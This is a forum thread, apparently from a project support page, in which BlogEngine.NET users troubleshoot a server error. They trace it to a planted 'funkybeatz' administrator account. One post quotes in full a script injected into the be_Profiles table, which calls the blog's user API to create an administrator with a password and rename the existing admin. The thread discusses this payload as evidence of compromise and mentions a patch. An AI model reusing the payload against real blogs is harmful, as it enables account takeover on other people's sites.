This project is read-only.

Server Error in '/' Application

Topics: ASP.NET 2.0, Controls
Feb 1, 2016 at 1:19 AM
I just log in -logout from admin panel of blogengine, after some time I got Server Error in '/' Application Error.
I didn't modify/change/update anything like database, config file etc.
How i remove this error.
Feb 1, 2016 at 2:03 AM
Edited Feb 1, 2016 at 2:15 AM
I found follwong :

Event code: 3008
Event message: A configuration error has occurred.
Event time: 1/31/2016 2:32:21 PM
Event time (UTC): 1/31/2016

at System.Web.Hosting.PipelineRuntime.InitializeApplication(IntPtr appContext)
The type initializer for 'BlogEngine.Core.Right' threw an exception.
at BlogEngine.Core.Right..ctor()
Item has already been added. Key in dictionary: 'funkybeatz' Key being added: 'funkybeatz'
\wwwroot\web.config line 149)
at System.Web.Security.Roles.Initialize()
Feb 9, 2016 at 12:06 PM
@zealgeeks did you solve it? the same problem for me...
Feb 9, 2016 at 12:34 PM
So.... take a look into your be_Users and be_UserRoles - there is a multiple entries for the "funkybeatz". That's a big security problem :(
Just delete this.
Feb 9, 2016 at 12:34 PM
Also all your posts may be deleted or ads were added :(

That's terrible..
Feb 9, 2016 at 12:45 PM
Also take a look into the be_Profiles table. Here is what I found:
 <script async>$.ajax({url:'/api/users',type:'POST',data:{UserName:'funkybeatz',Email:'',Password:'82hv7gdwjxgqw3',roles:[{IsChecked:!0,RoleName:'Administrators',IsSystemRole:!0}]},dataType:'json',success:function(a){$.ajax({url:'/api/users/saveprofile/item',type:'PUT',data:{UserName:'admin',Profile:{DisplayName:'Kai'}},dataType:'json'})}});</script><a>
That looks like Cross Site Request Forgery.
Feb 9, 2016 at 1:11 PM
Are you running the updated version? How's your server confit?
Feb 9, 2016 at 5:16 PM
For 3.2 it was patched month ago. If you have older version, look here: